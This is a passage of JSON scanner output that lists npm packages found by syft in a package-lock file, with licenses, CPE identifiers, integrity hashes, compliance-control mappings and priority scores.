"priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "15b2afab0d6c8b1b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: balanced-match 1.0.2", "title": "balanced-match 1.0.2", "description": "Package discovered: balanced-match 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0d7c80c1e227b7e2", "name": "balanced-match", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/balanced-match@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e3263834d404d719", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: base64-js 0.0.8", "title": "base64-js 0.0.8", "description": "Package discovered: base64-js 0.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b2d621b6dd16cf05", "name": "base64-js", "version": "0.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/base64-js@0.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz", "integrity": "sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "277066fc01f56c50", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: base64-js 1.5.1", "title": "base64-js 1.5.1", "description": "Package discovered: base64-js 1.5.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c7ab39b9720e240f", "name": "base64-js", "version": "1.5.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/base64-js@1.5.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d8b667ce3a0cff7b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: base64id 2.0.0", "title": "base64id 2.0.0", "description": "Package discovered: base64id 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "224462b6727019f7", "name": "base64id", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/base64id@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", "integrity": "sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b03c61c0d46ca441", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: baseline-browser-mapping 2.10.24", "title": "baseline-browser-mapping 2.10.24", "description": "Package discovered: baseline-browser-mapping 2.10.24", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "013c8659dba6bad8", "name": "baseline-browser-mapping", "version": "2.10.24", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/baseline-browser-mapping@2.10.24", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz", "integrity": "sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "83b4bdfed9e1341d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: basic-auth 2.0.1", "title": "basic-auth 2.0.1", "description": "Package discovered: basic-auth 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3e5df9b4f6b62db4", "name": "basic-auth", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/basic-auth@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", "dependencies": { "safe-buffer": "5.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "673442d13a9240b9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: bcryptjs 2.4.3", "title": "bcryptjs 2.4.3", "description": "Package discovered: bcryptjs 2.4.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "06243f2e41cd3912", "name": "bcryptjs", "version": "2.4.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/bcryptjs@2.4.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", "integrity": "sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b36a32eeee7b64f7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: bidi-js 1.0.3", "title": "bidi-js 1.0.3", "description": "Package discovered: bidi-js 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "983a70fcd42b01da", "name": "bidi-js", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/bidi-js@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz", "integrity": "sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==", "dependencies": { "require-from-string": "^2.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2fa656db5288bebd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: bignumber.js 9.3.1", "title": "bignumber.js 9.3.1", "description": "Package discovered: bignumber.js 9.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0debd0f90c403668", "name": "bignumber.js", "version": "9.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/bignumber.js@9.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz", "integrity": "sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 